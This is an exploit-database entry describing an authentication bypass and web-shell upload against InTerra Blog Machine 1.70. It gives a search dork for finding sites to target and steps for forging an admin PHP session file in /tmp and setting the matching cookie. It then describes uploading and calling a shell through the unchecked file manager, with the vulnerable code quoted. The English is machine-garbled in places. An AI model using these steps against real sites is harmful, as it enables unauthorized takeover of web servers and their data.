[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

InTerra Blog Machine <= 1.70 Shell Upload Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11175
Category
web applications
Date add
05-03-2010
Platform
unsorted
=======================================================
InTerra Blog Machine <= 1.70 Shell Upload Vulnerability
=======================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com

Product: InTerra Blog Machine
Version: 1.70
Site: Dull.ru
Dork : "Powered by InTerra Blog Machine"

Authorization. The substitution sesii.


PHP code:

 //check access 
    if(!$_SESSION['admin']){ 
        header("Location: " . SERVER_ROOT); 
        exit; 
    } 


go to / tmp

create sesiyu, 0777 law:

sess_aaec41a3b692b6be0dc292e40b778595

Code:

admin|b:1;

And Cook hammer in your browser.

PHPSESSID=aaec41a3b692b6be0dc292e40b778595

	
After authentication :

http://127.0.0.1/interra/filemanager/

And pour shell. Checks not (:
lib \ uploader.class.php

PHP code:

 function copyFile($name,$destination){ 
            if(!$result = move_uploaded_file($name,$destination)){ 
                $result = copy($name,$destination); 
            } 
            return $result;  
        } 

http://127.0.0.1/interra/files/shell.php




#  0day.today [2024-05-13]  #